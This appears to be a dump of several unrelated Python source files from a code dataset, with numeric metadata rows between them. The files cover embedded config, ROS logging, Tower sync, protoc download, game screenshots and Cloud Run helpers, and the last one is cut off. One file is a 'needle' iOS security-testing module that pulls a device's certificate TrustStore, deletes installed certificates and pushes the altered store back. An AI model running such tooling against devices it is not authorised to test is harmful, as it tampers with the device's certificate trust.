| 32.192771 | 91 | 0.646707 | 433 | 2,672 | 3.965358 | 0.233256 | 0.073384 | 0.090856 | 0.052417 | 0.16191 | 0.083867 | 0 | 0 | 0 | 0 | 0 | 0.089395 | 0.145958 | 2,672 | 82 | 92 | 32.585366 | 0.663015 | 0 | 0 | 0.054054 | 0 | 0 | 0.146332 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.040541 | 0 | 0.094595 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8f886cd6aace4df9f638acf92dd610922773ad | 5,732 | py | Python | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | """*****************************************************************************
* Copyright (C) 2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
Log.writeInfoMessage("Loading Cache for " + Variables.get("__PROCESSOR"))
def cacheEnable(symbol, event):
symbol.setValue(event["value"], 1)
def cacheFilesEnable(symbol, event):
symbol.setEnabled(event["value"])
dcacheEnable = coreComponent.createBooleanSymbol("USE_CACHE_MAINTENANCE", cacheMenu)
dcacheEnable.setLabel("Use Cache Maintenance")
dcacheEnable.setDefaultValue(False)
dcacheEnable = coreComponent.createBooleanSymbol("DATA_CACHE_ENABLE", cacheMenu)
dcacheEnable.setLabel("Enable Data Cache")
dcacheEnable.setDefaultValue(False)
dcacheEnable.setVisible(False)
dcacheEnable.setReadOnly(True)
dcacheEnable.setDependencies(cacheEnable, ["USE_CACHE_MAINTENANCE"])
icacheEnable = coreComponent.createBooleanSymbol("INSTRUCTION_CACHE_ENABLE", cacheMenu)
icacheEnable.setLabel("Enable Instruction Cache")
icacheEnable.setDefaultValue(False)
icacheEnable.setVisible(False)
icacheEnable.setReadOnly(True)
icacheEnable.setDependencies(cacheEnable, ["USE_CACHE_MAINTENANCE"])
cacheAlign = coreComponent.createIntegerSymbol("CACHE_ALIGN", cacheMenu)
cacheAlign.setLabel("Cache Alignment Length")
cacheAlign.setVisible(False)
cacheAlign.setDefaultValue(16)
############################################################################
#### Code Generation ####
############################################################################
configName = Variables.get("__CONFIGURATION_NAME")
cacheSourceFile = coreComponent.createFileSymbol("CACHE_LOCAL_H", None)
cacheSourceFile.setSourcePath("../peripheral/cache/templates/plib_cache_local.h")
cacheSourceFile.setOutputName("plib_cache_local.h")
cacheSourceFile.setDestPath("peripheral/cache/")
cacheSourceFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourceFile.setType("SOURCE")
cacheSourceFile.setEnabled(False)
cacheSourceFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheHeaderFile = coreComponent.createFileSymbol("CACHE_HEADER_H", None)
cacheHeaderFile.setSourcePath("../peripheral/cache/templates/plib_cache.h")
cacheHeaderFile.setOutputName("plib_cache.h")
cacheHeaderFile.setDestPath("peripheral/cache/")
cacheHeaderFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheHeaderFile.setType("HEADER")
cacheHeaderFile.setEnabled(False)
cacheHeaderFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSourcePic32MzFile = coreComponent.createFileSymbol("CACHE_SOURCE_PIC32MZ_C", None)
cacheSourcePic32MzFile.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.c")
cacheSourcePic32MzFile.setOutputName("plib_cache.c")
cacheSourcePic32MzFile.setDestPath("peripheral/cache/")
cacheSourcePic32MzFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourcePic32MzFile.setType("SOURCE")
cacheSourcePic32MzFile.setEnabled(False)
cacheSourcePic32MzFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheHeaderPic32MzFile = coreComponent.createFileSymbol("CACHE_PIC32MZ_H", None)
cacheHeaderPic32MzFile.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.h")
cacheHeaderPic32MzFile.setOutputName("plib_cache_pic32mz.h")
cacheHeaderPic32MzFile.setDestPath("peripheral/cache/")
cacheHeaderPic32MzFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheHeaderPic32MzFile.setType("HEADER")
cacheHeaderPic32MzFile.setEnabled(False)
cacheHeaderPic32MzFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSourcePic32MzAsm = coreComponent.createFileSymbol("CACHE_SOURCE_PIC32MZ_S", None)
cacheSourcePic32MzAsm.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.S")
cacheSourcePic32MzAsm.setOutputName("plib_cache_pic32mz.S")
cacheSourcePic32MzAsm.setDestPath("peripheral/cache/")
cacheSourcePic32MzAsm.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourcePic32MzAsm.setType("SOURCE")
cacheSourcePic32MzAsm.setEnabled(False)
cacheSourcePic32MzAsm.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSystemDefFile = coreComponent.createFileSymbol("CACHE_SYSTEM_DEF_H", None)
cacheSystemDefFile.setType("STRING")
cacheSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
cacheSystemDefFile.setSourcePath("../peripheral/cache/templates/system/definitions.h.ftl")
cacheSystemDefFile.setMarkup(True)
cacheSystemDefFile.setEnabled(False)
cacheSystemDefFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
| 51.178571 | 90 | 0.786113 | 550 | 5,732 | 8.076364 | 0.32 | 0.05403 | 0.042774 | 0.049977 | 0.255065 | 0.056506 | 0.035795 | 0 | 0 | 0 | 0 | 0.013244 | 0.064724 | 5,732 | 111 | 91 | 51.63964 | 0.815333 | 0.232903 | 0 | 0.027778 | 0 | 0 | 0.271567 | 0.139447 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b910569942467e577079fe4e9a61358382e951f | 2,087 | py | Python | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | 2 | 2021-01-11T07:11:29.000Z | 2021-12-21T00:57:47.000Z | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | null | null | null | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | null | null | null | from core.framework.module import BaseModule
from core.utils.constants import Constants
import imp
class Module(BaseModule):
meta = {
'name': 'Delete Installed Certificate',
'author': '@LanciniMarco (@MWRLabs)',
'description': 'Delete one (or more) certificates installed on device',
'options': (
),
}
# ==================================================================================================================
# UTILS
# ==================================================================================================================
def module_pre(self):
return BaseModule.module_pre(self, bypass_app=True)
def pull_ts(self):
self.printer.info("Looking for the TrustStore.sqlite3 file...")
self.truststore_path = Constants.DEVICE_PATH_TRUST_STORE
self.db = self.local_op.build_temp_path_for_file(self, "TrustStore.sqlite3")
if not self.device.remote_op.file_exist(self.truststore_path):
raise Exception("TrustStore file not found on device!")
else:
self.device.pull(self.truststore_path, self.db)
# ==================================================================================================================
# RUN
# ==================================================================================================================
def module_run(self):
# Pull TrustStore.sqlite3
self.pull_ts()
# Delete certificates
adv = imp.load_source("TrustStore", self.TOOLS_LOCAL['ADVTRUSTSTORE'])
tstore = adv.TrustStore(self.db)
tstore.delete_certificates()
# Backup
self.printer.debug("Backing up the original TrustStore...")
bkp = "%s.bkp" % Constants.DEVICE_PATH_TRUST_STORE
self.device.remote_op.file_copy(self.truststore_path, bkp)
# Updating device
self.printer.info("Uploading new TrustStore to device...")
self.device.push(self.db, self.truststore_path)
| 41.74 | 121 | 0.490656 | 185 | 2,087 | 5.378378 | 0.427027 | 0.084422 | 0.090452 | 0.048241 | 0.106533 | 0.066332 | 0 | 0 | 0 | 0 | 0 | 0.001818 | 0.209391 | 2,087 | 49 | 122 | 42.591837 | 0.601212 | 0.256828 | 0 | 0 | 0 | 0 | 0.222669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0.032258 | 0.096774 | 0.032258 | 0.290323 | 0.096774 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b91a1dbe73bc84767866f323394da7c9dd14b22 | 5,212 | py | Python | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | null | null | null | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | null | null | null | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | 2 | 2020-03-02T06:56:48.000Z | 2020-10-25T09:49:30.000Z | #!/usr/bin/env python
import time
import rospy
import csv
import sys
from math import pow, sqrt
from diagnostic_msgs.msg import DiagnosticArray
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Imu
class Log():
"""docstring for Log"""
def __init__(self):
self._sub = rospy.Subscriber("/diagnostics", DiagnosticArray, self.diagnosticsCallback)
self._sub = rospy.Subscriber("/odom", Odometry, self.odomCallback)
self._sub = rospy.Subscriber("/imu_data", Imu, self.imuCallback)
self.dict_log = dict()
self.datas_log = []
self.time_init = [0, 0, 0]
self.time_now = [0, 0, 0]
self.time_use = [0, 0, 0]
self.time_log = 0
self.file_name = ''
self.time_now_name = ''
self.args_num = len(sys.argv)
self.ROCS_writer = False
self.IMU_writer = False
self.ODOM_writer = False
self.distance = 0
self.pose_x_last = 0
self.pose_y_last = 0
def diagnosticsCallback(self, msg):
if self.ROCS_writer:
self.time_log = self.time_now[0] - self.time_init[0]
if msg.status[0].name == 'hongfu_bms_status_node: BMS':
self.time_now[0] = msg.header.stamp.secs
if self.time_init[0] == 0 or self.time_log >= 600:
ROCS = msg.status[0].values[0].value
dict_ROCS = {'ROCS':ROCS, 'time1':self.time_use[0]}
print(dict_ROCS)
# dict_log.update(xx)
# self.datas_log.append(self.dict_log)
self.logWriter('ROCS', 'ab+', 'time1', dict_ROCS)
self.time_init[0] = self.time_now[0]
self.time_use[0] += 10
def imuCallback(self, msg):
# rospy.loginfo('imu1')
if self.IMU_writer:
self.time_log = self.time_now[1] - self.time_init[1]
self.time_now[1] = msg.header.stamp.secs
if self.time_init[1] == 0 or self.time_log >= 1800:
x = msg.orientation.x
y = msg.orientation.y
z = msg.orientation.z
w = msg.orientation.w
orientation = 'x:' + str(x) + ' y:' + str(y) + ' z:' + str(z) +' w:' + str(w)
dict_orientation = {'orientation':orientation, 'time2':self.time_use[1]}
# self.dict_log.update(dict_orientation)
print(self.dict_log)
self.logWriter('orientation', 'ab+', 'time2', dict_orientation)
self.time_init[1] = self.time_now[1]
self.time_use[1] += 30
def odomCallback(self, msg):
if self.ODOM_writer:
self.pose_x_now = msg.pose.pose.position.x
self.pose_y_now = msg.pose.pose.position.y
if self.pose_x_last == 0:
self.pose_x_last = msg.pose.pose.position.x
self.pose_y_last = msg.pose.pose.position.y
distance_last = sqrt(pow(self.pose_x_now - self.pose_x_last, 2) + pow(self.pose_y_now - self.pose_y_last, 2))
self.distance = self.distance + distance_last
self.time_log = self.time_now[2] - self.time_init[2]
self.time_now[2] = msg.header.stamp.secs
if self.time_init[2] == 0 or self.time_log >= 120:
dict_odom = {'odom':self.distance, 'time3':self.time_use[2]}
# self.dict_log.update(dict_odom)
print(self.dict_log)
self.logWriter('odom', 'wb+', 'time3', dict_odom)
self.time_init[2] = self.time_now[2]
self.time_use[2] += 2
def logWriter(self, status, file_option, time_option, dict_option):
# rospy.loginfo('writer1')
if self.file_name == '':
# rospy.loginfo('writer2')
self.time_now_name = time.strftime("%Y%m%d%H%M", time.localtime())
self.file_name = 'caster-test-log-' + status + self.time_now_name + '.csv'
with open('/home/caster/Documents/caster-tests/logs/'+self.file_name, file_option) as f:
writer = csv.DictWriter(f, [status, time_option])
rospy.loginfo('write' + status)
# if csv.Sniffer().has_header(f.read(1024)):
if f.read(1024) == '':
writer.writeheader()
# for row in dict_log:
writer.writerow(dict_option)
# writer.writerows(self.dict_log)
def getArgs(self):
args_number = len(sys.argv)
args_list = sys.argv
if args_number != 1:
for index in range(args_number):
if args_list[index] == 'ROCS':
self.ROCS_writer = True
elif args_list[index] == 'IMU':
self.IMU_writer = True
elif args_list[index] == 'ODOM':
self.ODOM_writer = True
else:
rospy.logerr('please input args')
rospy.signal_shutdown('please input args')
def main():
rospy.init_node('caster_test_log')
Logs = Log()
Logs.getArgs()
rospy.spin()
if __name__ == "__main__":
try:
main()
except rospy.ROSInterruptException:
pass
| 40.403101 | 121 | 0.557751 | 674 | 5,212 | 4.108309 | 0.204748 | 0.106898 | 0.051643 | 0.018779 | 0.273023 | 0.193211 | 0.127844 | 0.09173 | 0 | 0 | 0 | 0.022203 | 0.317345 | 5,212 | 128 | 122 | 40.71875 | 0.756043 | 0.064083 | 0 | 0.018868 | 0 | 0 | 0.05863 | 0.013166 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066038 | false | 0.009434 | 0.075472 | 0 | 0.150943 | 0.028302 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b93b80f280d4e5b824d6da30fa8ee84290f10b4 | 2,242 | py | Python | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 7 | 2020-05-05T14:42:57.000Z | 2020-12-15T11:22:08.000Z | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 5 | 2020-05-19T12:34:51.000Z | 2020-08-05T11:14:17.000Z | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 2 | 2020-09-14T09:12:19.000Z | 2021-04-13T10:11:22.000Z | import glob
import click
from atacac._utils import log, tower_list_all, load_asset
@click.command()
@click.argument('label_id', envvar='LABEL_ID')
@click.argument('assets_glob', envvar='ASSETS_GLOB')
def main(label_id, assets_glob):
"""
Check for missing assets.
\f
Check if the repository's assets exits in Tower under a specific label and
vice versa.
!! ASSETS_GLOB must be in single quotes to prevent glob pattern expansion in
shell.
\b
Folloving arguments can be passed via environment variables:
* LABEL_ID
* ASSETS_GLOB
"""
# list of asset type+name in repository
local_assets = []
for file_name in sorted(glob.glob(assets_glob, recursive=True)):
asset = load_asset(file_name)
local_assets.append((asset['asset_type'], asset['name']))
# list of asset type+name in tower
tower_assets = [
(item['type'], item['name'])
for item in tower_list_all([('labels', label_id)])
]
common_assets = set(tower_assets).intersection(set(local_assets))
for asset_type, asset_name in common_assets:
log('INFO', (f"'{asset_name}' of type {asset_type} located both in the "
"repository and in the tower"))
# symmetric difference == disjunctive union == union without the intersection
diff = set(tower_assets).symmetric_difference(set(local_assets))
error = False
for asset in diff:
asset_type, asset_name = asset
if asset not in tower_assets:
log('WARNING', (f"'{asset_name}' of type {asset_type} not found in "
"tower ... will be recreated"))
elif asset not in local_assets:
error = True
log('ERROR', (f"'{asset_name}' of type {asset_type} not found in "
"repository ... will be reported (not allowed)"))
if error:
log('INFO', (
"Investigate if the asset should be deleted from tower, "
"added to the repository, or it's label removed."
))
log('ERROR', "Reported error(s) are not permitted!", fatal=True)
if __name__ == "__main__":
# pylint: disable=unexpected-keyword-arg,no-value-for-parameter
main()
| 32.492754 | 81 | 0.632917 | 295 | 2,242 | 4.637288 | 0.352542 | 0.052632 | 0.030702 | 0.039474 | 0.100146 | 0.100146 | 0.069444 | 0.05117 | 0.05117 | 0.05117 | 0 | 0 | 0.26182 | 2,242 | 68 | 82 | 32.970588 | 0.826586 | 0.225691 | 0 | 0 | 0 | 0 | 0.29184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.078947 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b990de9cfa031b643b3e8decac5fcb265580182 | 1,517 | py | Python | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | import platform
import click
PROTO_VERSION = "3.19.2"
PROTO_REPO = "https://github.com/protocolbuffers/protobuf/releases"
class ProtoBin(object):
def __init__(self, protoc_filename: str, system_os: str):
"""
Initializes the ProtoBin object.
:param protoc_filename: The name of the protoc binary that's platform dependent.
:param system_os: The OS where the proto_builder is being used.
"""
self.protoc_filename = protoc_filename
self.platform = system_os
self.proto_c_zip_file_name = f"{self.protoc_filename}.zip"
self.proto_c_url = f"{PROTO_REPO}/download/v{PROTO_VERSION}/{self.proto_c_zip_file_name}"
def get_platform() -> ProtoBin:
"""
Gets the string representing the platform running the code.
:return: the system string to download files from Protobuf git
"""
click.echo("Discovering OS ...")
system = platform.system()
click.echo(f"System is {system}. Creating binary urls for the platform.")
if system == "Linux":
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-linux-x86_64",
system_os="linux")
elif system == "Darwin":
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-osx-x86_64",
system_os='mac')
else:
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-win64",
system_os='win')
def in_wsl() -> bool:
return 'microsoft-standard' in platform.uname().release
| 34.477273 | 97 | 0.662492 | 195 | 1,517 | 4.948718 | 0.415385 | 0.116062 | 0.055959 | 0.087047 | 0.189637 | 0.189637 | 0.146114 | 0.146114 | 0 | 0 | 0 | 0.011976 | 0.2294 | 1,517 | 43 | 98 | 35.27907 | 0.813516 | 0.197759 | 0 | 0 | 0 | 0 | 0.313472 | 0.163212 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.08 | 0.04 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9be1ac82e683a0e1c250704aaff0a44bb4954a | 1,319 | py | Python | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | 18 | 2020-02-28T10:22:29.000Z | 2022-01-22T08:20:22.000Z | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | null | null | null | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | 1 | 2020-03-07T22:13:57.000Z | 2020-03-07T22:13:57.000Z | import os
from subprocess import Popen
from shutil import copyfile
script_filepath = os.path.realpath(__file__)
script_folder = os.path.dirname(script_filepath)
#save_folder = script_folder + '../../saves/0.17-Built-in-timelapse'
save_folder = os.path.join(script_folder, '..' , '..', 'saves', '0.17-Built-in-timelapse')
# create a copy of control.lua
copied_file_name = 'python-copy-control.lua'
copyfile('control.lua', copied_file_name)
for f in os.listdir(save_folder):
filename_end = '.zip'
if f[-len(filename_end):] == filename_end:
# write into control.lua
output_file = open('control.lua', 'w')
with open(copied_file_name, 'r') as control_file:
all_lines = control_file.readlines()
for l in all_lines:
output_line = l
line_start = ' local timelapse_subfolder = '
if l[:len(line_start)] == line_start:
output_line = line_start + "'" + f[:-len(filename_end)] + "/'\n"
output_file.write(output_line)
output_file.close()
bin_path = os.path.join(script_folder, '..', '..', 'bin', 'Releasex64vs2017', 'factorio-run.exe')
process_line = bin_path + ' --benchmark-graphics ' + str(os.path.join('0.17-Built-in-timelapse' , f)) + ' --benchmark-ticks 21'
process = Popen(process_line)
process.communicate()
os.remove(copied_file_name) | 38.794118 | 129 | 0.68461 | 185 | 1,319 | 4.643243 | 0.378378 | 0.034924 | 0.065192 | 0.034924 | 0.199069 | 0.083818 | 0.083818 | 0.083818 | 0 | 0 | 0 | 0.015371 | 0.161486 | 1,319 | 34 | 130 | 38.794118 | 0.761302 | 0.09022 | 0 | 0 | 0 | 0 | 0.186144 | 0.057596 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9ebd7f50ebcf431c15405bf1d6de861cfd7ba8 | 9,639 | py | Python | clarify/serve/utils/cloudrun_utils.py | cwbeitel/clarify | b54bde103684f19b2da1e455c4231aeb6ad0a771 | [
"Apache-2.0"
] | 8 | 2020-01-24T20:53:21.000Z | 2021-04-02T11:18:56.000Z | clarify/serve/utils/cloudrun_utils.py | cwbeitel/clarify | b54bde103684f19b2da1e455c4231aeb6ad0a771 | [
"Apache-2.0"
] | 123 | 2020-01-16T00:29:27.000Z | 2022-03-08T23:39:36.000Z | clarify/serve/utils/cloudrun_utils.py | hmallen99/project_clarify | 2753e82046a8fa94e55165f84b154ecdacdeb558 | [
"Apache-2.0"
] | 4 | 2020-02-01T05:11:37.000Z | 2020-03-22T23:35:45.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from clarify.utils.cmd_utils import run_and_output
from clarify.utils.gcb_utils import generate_image_tag
from clarify.utils.gcb_utils import gcb_build_and_push
from clarify.utils.fs_utils import get_pcml_root
from clarify.utils.fs_utils import TemporaryDirectory
from clarify.serve.utils import deployment_utils
import datetime
import os
import yaml
import uuid
import re
import dateutil
import tensorflow as tf
from google.cloud import pubsub_v1
from google.oauth2 import service_account
import googleapiclient.discovery
from googleapiclient import _auth
credentials = _auth.default_credentials()
service = googleapiclient.discovery.build('iam', 'v1', credentials=credentials)
crm_service = googleapiclient.discovery.build('cloudresourcemanager',
'v1',
credentials=credentials)
cloudbuild = googleapiclient.discovery.build('cloudbuild',
'v1',
credentials=credentials)
def latest_successful_build(image_uri, project_id):
"""Given an image URI get the most recent green cloudbuild."""
builds = cloudbuild.projects().builds().list(projectId=project_id).execute()
uri_prefix = image_uri.split(":")[0]
latest_time = None
latest = None
for build in builds["builds"]:
if build["status"] == "SUCCESS":
images = build["images"]
if len(images) == 1:
if images[0].startswith(uri_prefix):
finish_time = dateutil.parser.parse(build["finishTime"])
if not latest:
latest_time = finish_time
if finish_time >= latest_time:
latest = images[0]
latest_time = finish_time
if latest:
tf.logging.info("Found a latest successful build: {}".format(latest))
return latest
def _build_cloud_run_image(function_name,
project_id,
default_cache_from="tensorflow/tensorflow:1.14.0"):
function_code_path = "functions/{}".format(function_name)
pcml_lib_root = os.path.join(get_pcml_root(), "pcml")
with TemporaryDirectory() as tmpdir:
tmp_lib_path = deployment_utils.prepare_functions_bundle(
function_code_path=function_code_path,
tmpdir=tmpdir,
pcml_lib_root=pcml_lib_root)
image_uri = generate_image_tag(project_id, function_name)
cache_from = latest_successful_build(image_uri=image_uri,
project_id=project_id)
if not cache_from:
cache_from = default_cache_from
gcb_build_and_push(image_tag=image_uri,
build_dir=tmp_lib_path,
cache_from=cache_from)
return image_uri
def update_service(function_name,
image_uri,
region,
memory="2Gi",
concurrency=40,
timeout="10m"):
"""Update a cloud run service given a container image."""
run_and_output([
"gcloud", "beta", "run", "deploy", "--platform", "managed", "--region",
region, function_name, "--image", image_uri, "--memory", memory,
"--timeout", timeout, "--concurrency",
str(concurrency)
])
def get_domain_for_cloudrun_service(service_name, region):
out = run_and_output([
"gcloud", "beta", "run", "services", "describe", service_name,
"--platform", "managed", "--region", region
])
domain = None
for line in out.split("\n"):
if "domain" in line:
domain = line.split("domain:")[1].split(" ")[1]
return domain
def list_service_accounts(project_id):
"""Lists all service accounts for the current project."""
service_accounts = service.projects().serviceAccounts().list(
name='projects/' + project_id).execute()
return service_accounts
def service_account_exists(service_account_email, project):
service_accounts = list_service_accounts(project)
for account in service_accounts["accounts"]:
if service_account_email == account["email"]:
return account
return None
def maybe_create_service_account(service_account_name, project):
service_account_email = "{}@{}.iam.gserviceaccount.com".format(
service_account_name, project)
if not service_account_exists(service_account_email=service_account_email,
project=project):
service_account = service.projects().serviceAccounts().create(
name='projects/' + project,
body={
'accountId': service_account_name,
'serviceAccount': {
'displayName': service_account_name
}
}).execute()
tf.logging.info('Created service account: ' + service_account['email'])
return service_account_email
def configure_invoker_sa(service_name, project, region):
service_account_name = "{}-invoker".format(service_name)
service_account_email = maybe_create_service_account(service_account_name,
project)
member_arg = "--member=serviceAccount:{}".format(service_account_email)
role_arg = "--role=roles/run.invoker"
run_and_output([
"gcloud", "beta", "run", "services", "add-iam-policy-binding",
"--platform", "managed", "--region", region, service_name, member_arg,
role_arg
])
return service_account_email
def get_project_number(project):
project_number = None
project_data = crm_service.projects().get(projectId=project).execute()
if project_data:
project_number = project_data["projectNumber"]
return project_number
def maybe_add_pubsub_token_creator_policy(project_id):
project_number = get_project_number(project_id)
pubsub_sa = "service-{}".format(project_number)
pubsub_sa += "@gcp-sa-pubsub.iam.gserviceaccount.com"
member_arg = "--member=serviceAccount:{}".format(pubsub_sa)
role_arg = "--role=roles/iam.serviceAccountTokenCreator"
run_and_output([
"gcloud", "projects", "add-iam-policy-binding", project_number,
member_arg, role_arg
])
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
subscriptions = subscriber.list_subscriptions(project_path)
return [subscription.name for subscription in subscriptions]
def maybe_create_topic(project, topic_name):
msg = "Creating topic {} in project {}".format(topic_name, project)
tf.logging.info(msg)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project, topic_name)
project_path = publisher.project_path(project)
topic_paths = [topic.name for topic in publisher.list_topics(project_path)]
if topic_path not in topic_paths:
topic = publisher.create_topic(topic_path)
def maybe_create_subscription_for_service(service_name, service_account_email,
service_url, project, region,
topic_name):
